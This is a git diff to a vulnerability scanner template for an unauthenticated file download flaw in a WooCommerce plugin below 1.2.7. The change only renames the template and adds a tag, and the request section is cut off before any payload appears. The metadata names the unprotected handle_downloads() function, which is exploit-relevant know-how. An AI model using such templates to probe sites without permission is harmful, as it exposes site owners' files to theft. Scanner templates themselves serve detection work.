--- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
@@ -1,7 +1,7 @@
id: wp-woocommerce-file-download
info:
- name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval
+ name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
author: 0x_Akoko
severity: high
description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated
@@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
- tags: wordpress,woocommerce,lfi
+ tags: wordpress,woocommerce,lfi,wp
requests:
- method: GET